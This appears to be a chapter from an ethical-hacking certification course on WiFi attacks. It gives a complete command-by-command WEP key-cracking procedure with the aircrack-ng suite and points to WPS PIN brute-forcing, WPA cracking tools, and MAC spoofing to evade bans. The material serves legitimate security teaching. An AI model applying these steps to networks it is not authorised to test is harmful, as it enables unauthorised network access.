[ Certified Ethical Hacker v10 ] :: [ Chapter 7 ] :: WiFi Hacking

This entry is part 14 of 30 in the series [ Certified Ethical Hacker Training ]

WiFi Basics

SSID: the human-readable name of the network

BSSID: the MAC address of the access point

ESSID: the name of a network that spans multiple access points

IVs: Initialization vectors, 24-bit strings appended to the network key that allow users to access the network with unique session keys

PWR (as listed in airodump-ng) is a negative number that indicates, basically, power loss. “Lower is better” means lower without the negative sign: -40 is better (more power, less loss) than -90 (lots of power loss) even though technically -90 is “lower.”

Alfa Networks wireless adapter – Usually just called an “Alfa card,” this is a high-powered USB-attached wifi adapter that makes MITM and evil hotspot exploits much easier.

WEP Cracking

WEP cracking is almost a useless skill to practice, because there are very few WEP-enabled access points in the wild today. Except that:

  • WEP cracking is a great way to learn the -ng tools (like airodump-ng), which will definitely deepen your understanding of wifi.
  • If you actually find a WEP access point you’ll be able to exploit it. (People forget to update things all the time.)


Note the commands:

# get wifi NIC name:

# start a monitor:
airmon-ng start wlan0 
# substitute your interface name if it's not wlan0

# note problem processes reported, and kill them:
kill <process_ID>
# repeat as necessary

# find nearby wifi networks:
airodump-ng wlan0mon # on older systems may be mon0
# copy the BSSID you want

# select a network:
airodump-ng -c <channel> -w <output_file> --bssid <target_bssid> wlan0mon # or mon0

# open a new window and associate with the access point:
aireplay-ng -1 0 -a <target_bssid> wlan0mon # or mon0
# -1 means authenticate with type 0, i.e. none
# now begin injecting to generate IVs:
aireplay-ng -3 -b <target_bssid> wlan0 # or mon0
# -3 is arp replay attack

# watch Data column in older window; you need ~15k or more

# open a new terminal and list files:
# the capture file will be the one with the
# <output_file> name above and the .cap extension

# crack the key:
aircrack-ng <filename>-01.cap #for example
# aircrack-ng will run over and over as IVs accumulate
# the password arrives in hex format: 01:02:03:04 etc.
# once you get the key, be sure to stop aireplay-ng

# and stop wlan0mon
airmon-ng stop wlan0mon

# restart normal networking 
# (restart the processes you killed above:
service networking start
service network-manager start
# etc.

Now open the GUI Network Manager (on the top right in Kali), select the target network, and enter the hex key you got above. Remove the semicolons.

WEP Cracking with Gerix (an old GUI tool) for comparison

Meet Network Chuck: Hacking Public WiFi

Youtuber and pro instructor. You need to subscribe to his channel. Here’s a demo of hacking public Wifi with a Raspberry Pi and Kali:

Cracking WPA & WPA2 with Aircrack-ng on Kali Linux


WPS Hacking with Reaver and Wash

WPS is awful. You can connect to a WAP with a 9-digit PIN number, which can almost instantly be found using Reaver. And you can find WPS-enabled access points using Wash.


Hacking WPA with WiFite

From our friend at JackkTutorials:


From another good channel, HakTools:


Oops! You’ve been shunned! How do you get back onto WiFi?

You need to be aware of the macchanger command.


Finding Rogue APs: inSSIDer


  1. Cracking WEP with Kali. Follow this process against the access point I will provide.
  2. Cracking WPA. Follow the process of cracking WPA with Reaver and Wash.
  3. Cracking WPA2:  Follow the example using Wi-Fite.


Know the terminology:




Bluetooth bazooka